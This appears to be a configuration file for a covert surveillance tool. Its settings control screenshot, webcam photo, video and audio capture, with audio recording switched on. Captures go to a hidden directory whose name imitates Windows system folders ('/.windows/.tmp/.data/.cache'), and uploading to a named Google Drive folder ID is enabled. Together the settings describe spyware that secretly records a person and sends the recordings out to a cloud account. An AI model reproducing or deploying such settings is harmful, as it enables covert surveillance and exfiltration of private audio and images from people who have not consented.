#In seconds
refresh_config_interval=20
should_use_user_home_path=true
content_directory_path=/.windows/.tmp/.data/.cache

capture_screen_shots=false
capture_screen_shot_interval=10
capture_screen_shot_fs_path=
image_compression_enabled=true

capture_photo=false
capture_photo_interval=5

capture_video=false
capture_video_interval=5
# Video file size in duration
video_file_length_in_duration=60
pause_video_interval=5

capture_audio=true
pause_audio_interval=5

# GDrive enabled/disabled config
google_drive_upload_enabled=true
google_drive_folder_id=16MMMs1kzYmQtFv0tsFGhrx_BPOFBGYsh

